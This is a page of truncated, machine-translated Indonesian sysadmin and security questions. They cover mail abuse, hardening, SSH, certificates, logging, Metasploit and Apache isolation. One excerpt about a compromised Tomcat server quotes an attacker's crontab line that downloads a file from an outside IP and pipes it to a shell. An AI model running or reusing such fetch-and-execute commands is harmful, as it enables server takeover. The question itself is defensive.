Salah satu server email semi-sibuk (sendmail) kami memiliki banyak koneksi inbound selama beberapa hari terakhir dari host yang mengeluarkan perintah sampah. Dalam dua hari terakhir: koneksi smtp masuk dengan perintah tidak valid dari 39.000 IP unik IP berasal dari berbagai rentang di seluruh...
Saya telah melihat menyebutkan mengamankan / dev / shm dan / proc dan saya bertanya-tanya bagaimana Anda melakukan itu dan apa yang dilakukan dengan melakukan? Saya berasumsi ini melibatkan /etc/sysctl.conf beberapa jenis hak. Seperti ini? kernel.exec-shield = 1 kernel.randomize_va_space = 1...
Pikirkan tentang perusahaan hosting web yang ingin membiarkan pengguna mengelola file dan menerima repositori melalui ssh. Ini termasuk: salinan aman (scp) membuat, menyalin, memindahkan / mengganti nama dan menghapus file mengeksekusi sebagian kecil perintah untuk kontrol sumber dan pengeditan...
Kami sudah memiliki sertifikat wildcard untuk *.mycompany.com. Jaringan kami memiliki host yang hanya dapat dijangkau secara internal. Semuanya milik internal.mycompany.comsubdomain. Ada server pribadi dengan nama host server.internal.mycompany.comtempat saya menyebarkan sertifikat wildcard...
Akun AWS gratis saya kedaluwarsa. Saya menghapus semua sumber daya S3 dan EC2, tetapi saya berkeliaran jika saya dapat meninggalkan Key Pairsdan Security Groupstanpa harus membayarnya. (Sumber daya akun saya terlihat seperti ini sekarang: Sumber ) Dokumentasi Amazon sepertinya tidak menyebutkan...
Saya memiliki server khusus debian. Saya mencoba untuk mengamankannya dan satu cara saya pikir akan lebih baik adalah mematikan layanan yang tidak saya butuhkan, seperti FTP misalnya. Saya menyarankan untuk menjalankan sesuatu seperti ini saat penerapan: service ntp stop update-rc.d -f ntp...
Latar Belakang : Agregasi log jarak jauh dianggap sebagai cara untuk meningkatkan keamanan. Secara umum, ini mengatasi risiko bahwa penyerang yang berkompromi dengan sistem dapat mengedit atau menghapus log untuk menggagalkan analisis forensik. Saya telah meneliti opsi keamanan di alat log...
Pertanyaan ini mengacu pada utas Twitter @ SwiftOnSecurity: https://twitter.com/SwiftOnSecurity/status/655208224572882944 Setelah membaca utas, saya masih belum mengerti mengapa Anda ingin menonaktifkan login jaringan untuk akun lokal. Jadi inilah yang saya pikirkan, tolong perbaiki saya di mana...
Metasploit baru di kalilinux 2016 (stable terbaru) systemctl start postgresql OK Pada msfconsole msf > db_status [*] postgresql connected to msf Ketika saya meluncurkan pencarian msf > search samba [!] Module database cache not built yet, using slow search Jadi saya membangun...
Saya baru saja menginstal MariaDbpada Gnome Ubuntu baru dan menjalankan mysql_secure_installation setelah itu di mana saya menetapkan kata sandi admin yang layak, menghapus pengguna anonim dll. Setelah itu saya menyadari beberapa perilaku aneh mengenai kata sandi admin: Jika saya mencoba masuk...
Tutup. Pertanyaan ini di luar topik . Saat ini tidak menerima jawaban. Ingin meningkatkan pertanyaan ini? Perbarui pertanyaan sehingga sesuai topik untuk Kesalahan Server. Ditutup 3 tahun yang lalu . Apa cara paling sederhana untuk mendapatkan
Saat menjalankan perang proyek di server tomcat Apache saya menemukan bahwa server telah dikompromikan. Saat menjalankan perang melawan orang tak dikenal cronberjalan seperti ini [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl...
Saya memiliki sekitar 200 pengguna. 50 di Asia, 50 di Eropa Selatan dan Timur dan sekitar 100 di Eropa Barat. Saya ingin mengarahkan 50 pengguna yang berada di Asia ke DC kami di Asia, dan saat ini tampaknya mereka mengautentikasi ke server Eropa kami, menyebabkan keterlambatan besar pada akhir...
Saya ingin Samhain memantau file, katakan misalnya /root/somefile,. File ini saat ini tidak ada, tetapi saya ingin diberi tahu jika itu dibuat kapan saja. Saya menambahkan ini ke samhainrc: [ReadOnly] file = /root/somefile Ini menyebabkan Samhain memancarkan entri log ini: Oct 18 22:54:04...
Saat ini saya sedang mengerjakan pengerasan server saya terhadap peretasan - di antara hal-hal lain, saya mendapatkan banyak upaya untuk masuk sebagai root dari ssh. Sementara saya telah mengimplementasikan fail2ban, saya bertanya-tanya, mengapa login root akan diizinkan secara default untuk...
Saya perlu mengatur konfigurasi server Apache untuk beberapa situs klien yang berjalan di bawah mesin Ubuntu 9.10 yang sama. Semua situs diizinkan menjalankan PHP, Python, dan Ruby on Rails. Saya tidak mengontrol kode sumber dari situs-situs ini dan karenanya saya perlu mengatur filter untuk...